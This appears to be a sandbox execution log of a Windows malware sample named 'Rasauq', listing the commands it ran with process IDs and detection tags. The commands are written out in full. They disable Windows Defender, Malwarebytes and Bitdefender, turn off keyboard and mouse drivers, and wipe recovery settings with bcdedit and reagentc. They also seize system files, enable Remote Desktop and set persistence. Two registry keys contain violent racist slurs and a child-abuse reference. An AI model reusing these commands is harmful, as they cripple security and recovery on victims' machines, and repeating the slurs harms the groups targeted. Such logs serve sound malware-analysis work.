C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵
- Sets desktop wallpaper using registry
PID:4268
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f4⤵PID:4660
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f4⤵PID:4708
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵PID:4544
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f4⤵PID:1372
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f4⤵PID:4036
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵PID:3328
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f4⤵PID:4688
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:5488
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f4⤵PID:3160
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f4⤵PID:5444
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5908
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:236
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled4⤵PID:1352
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:3556
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:1388
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:5608
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:5272
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:2464
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
PID:1908
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f4⤵PID:6140
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f4⤵PID:3828
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
PID:5852
-
-
C:\Windows\system32\cmd.execmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"4⤵PID:5876
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f5⤵PID:4932
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6044
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f4⤵PID:5368
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f4⤵PID:724
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f4⤵PID:3224
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f4⤵PID:5380
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f4⤵PID:5092
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f4⤵PID:5072
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f4⤵PID:2116
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:5304
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f4⤵PID:5132
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f4⤵PID:3168
-
-
C:\Windows\system32\ReAgentc.exereagentc /disable4⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1336
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:768
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:580
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1920
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
PID:4100
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue {default} recoveryenabled4⤵
- Modifies boot configuration data using bcdedit
PID:3420
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f4⤵PID:4260
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵PID:3660
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:5732
-
-
C:\Windows\system32\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f4⤵PID:5716
-
-
C:\Windows\system32\reg.exeREG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:2080
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:3840
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
PID:1368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableAntiTamper $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5836
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3224
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\wscsvc.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5240
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbam.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MBAMService.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:300
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamtray.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5236
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamscheduler.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
-
C:\Windows\system32\sc.exesc stop MBAMService4⤵
- Launches sc.exe
PID:3752
-
-
C:\Windows\system32\sc.exesc delete MBAMService4⤵
- Launches sc.exe
PID:3764
-
-
C:\Windows\system32\sc.exesc stop MBAMProtector4⤵
- Launches sc.exe
PID:4304
-
-
C:\Windows\system32\sc.exesc delete MBAMProtector4⤵
- Launches sc.exe
PID:3648
-
-
C:\Windows\system32\sc.exesc stop MBAMChameleon4⤵
- Launches sc.exe
PID:4428
-
-
C:\Windows\system32\sc.exesc delete MBAMChameleon4⤵
- Launches sc.exe
PID:5736
-
-
C:\Windows\system32\sc.exesc stop MBAMFarflt4⤵
- Launches sc.exe
PID:5476
-
-
C:\Windows\system32\sc.exesc delete MBAMFarflt4⤵
- Launches sc.exe
PID:5228
-
-
C:\Windows\system32\sc.exesc stop MBAMSwissArmy4⤵
- Launches sc.exe
PID:5144
-
-
C:\Windows\system32\sc.exesc delete MBAMSwissArmy4⤵
- Launches sc.exe
PID:3148
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f4⤵PID:3804
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f4⤵PID:4724
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f4⤵PID:2100
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f4⤵PID:1960
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f4⤵PID:2272
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f4⤵PID:4088
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdservicehost.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdagent.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5320
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdredline.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdparentalservice.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5744
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdreinit.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4660
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdsubwiz.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4492
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM seccenter.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vsserv.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3080
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epssecurityservice.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Windows\system32\sc.exesc stop bdservicehost4⤵
- Launches sc.exe
PID:236
-
-
C:\Windows\system32\sc.exesc delete bdservicehost4⤵PID:1176
-
-
C:\Windows\system32\sc.exesc stop bdagent4⤵
- Launches sc.exe
PID:856
-
-
C:\Windows\system32\sc.exesc delete bdagent4⤵
- Launches sc.exe
PID:4664
-
-
C:\Windows\system32\sc.exesc stop bdredline4⤵
- Launches sc.exe
PID:1016
-
-
C:\Windows\system32\sc.exesc delete bdredline4⤵
- Launches sc.exe
PID:3784
-
-
C:\Windows\system32\sc.exesc stop bdparentalservice4⤵PID:3860
-
-
C:\Windows\system32\sc.exesc delete bdparentalservice4⤵
- Launches sc.exe
PID:5704
-
-
C:\Windows\system32\sc.exesc stop bdreinit4⤵PID:4012
-
-
C:\Windows\system32\sc.exesc delete bdreinit4⤵
- Launches sc.exe
PID:780
-
-
C:\Windows\system32\sc.exesc stop bdsubwiz4⤵
- Launches sc.exe
PID:2664
-
-
C:\Windows\system32\sc.exesc delete bdsubwiz4⤵PID:3828
-
-
C:\Windows\system32\sc.exesc stop seccenter4⤵
- Launches sc.exe
PID:4104
-
-
C:\Windows\system32\sc.exesc delete seccenter4⤵
- Launches sc.exe
PID:2324
-
-
C:\Windows\system32\sc.exesc stop vsserv4⤵PID:2976
-
-
C:\Windows\system32\sc.exesc delete vsserv4⤵
- Launches sc.exe
PID:1656
-
-
C:\Windows\system32\sc.exesc stop epssecurityservice4⤵
- Launches sc.exe
PID:1888
-
-
C:\Windows\system32\sc.exesc delete epssecurityservice4⤵
- Launches sc.exe
PID:2832
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f4⤵PID:1392
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f4⤵PID:2016
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f4⤵PID:1440
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f4⤵PID:5424
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f4⤵PID:5004
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f4⤵PID:2464
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f4⤵PID:2172
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f4⤵PID:3708
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f4⤵PID:132
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f4⤵PID:4884
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f4⤵PID:5276
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:4228
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵PID:740
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f4⤵PID:1540
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f4⤵PID:4476
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f4⤵PID:1716
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵PID:4404
-
-
C:\Windows\system32\sc.exesc delete WinDefend4⤵
- Launches sc.exe
PID:1616
-
-
C:\Windows\system32\sc.exesc stop SecurityHealthService4⤵
- Launches sc.exe
PID:728
-
-
C:\Windows\system32\sc.exesc delete SecurityHealthService4⤵
- Launches sc.exe
PID:2008
-
-
C:\Windows\system32\sc.exesc stop Sense4⤵
- Launches sc.exe
PID:3092
-
-
C:\Windows\system32\sc.exesc delete Sense4⤵PID:1444
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MsMpEng.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3376
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MpCmdRun.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SecurityHealthSystray.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM smartscreen.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5836
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4880
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:296
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1072
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f4⤵PID:5212
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f4⤵PID:3620
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f4⤵PID:4448
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f4⤵PID:3732
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\notepad.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4668
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4712
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\calc.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1700
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5692
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5916
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2692
-
-
C:\Windows\system32\powercfg.exepowercfg /hibernate off REM Disables hibernation4⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in4⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:484
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-dc 0 REM Prevents sleep on battery4⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in4⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5728
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "Device Name"4⤵
- Power Settings
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:5884
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "USB Root Hub"4⤵
- Power Settings
- Checks SCSI registry key(s)
PID:4240
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f4⤵
- Adds Run key to start application
PID:1848
-
-
C:\Windows\system32\reg.exereg add "HKCR\behead all niggers" /f4⤵
- Modifies registry class
PID:2080
-
-
C:\Windows\system32\reg.exereg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f4⤵PID:2280
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"4⤵PID:5716
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f4⤵
- Adds Run key to start application
PID:5200
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k4⤵PID:4840
-
C:\Windows\system32\reg.exereg query "HKU" /s /f "Software" /k5⤵PID:5944
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:5296
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:5844
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:2140
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:5444
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:5596
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:6060
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:6076
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:1928
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:4828
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:1980
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Software\Rasauq on top" /f4⤵PID:6080
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f4⤵PID:1176
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f4⤵PID:4664
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f4⤵PID:860
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:2496
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:5528
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:1908
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:3916
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:3700
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:4104
-
-
C:\Windows\system32\reg.exereg add "End of search: 20 match(es) found.\Software\Rasauq on top" /f4⤵PID:4220
-
-
C:\Windows\system32\msg.exemsg * /time:3 "This machine has been compromised by Rasuaq"4⤵PID:2976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn-cf-east.streamable.com/video/mp4/j3mt4w.mp4?Expires=17424670400714⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3708 -
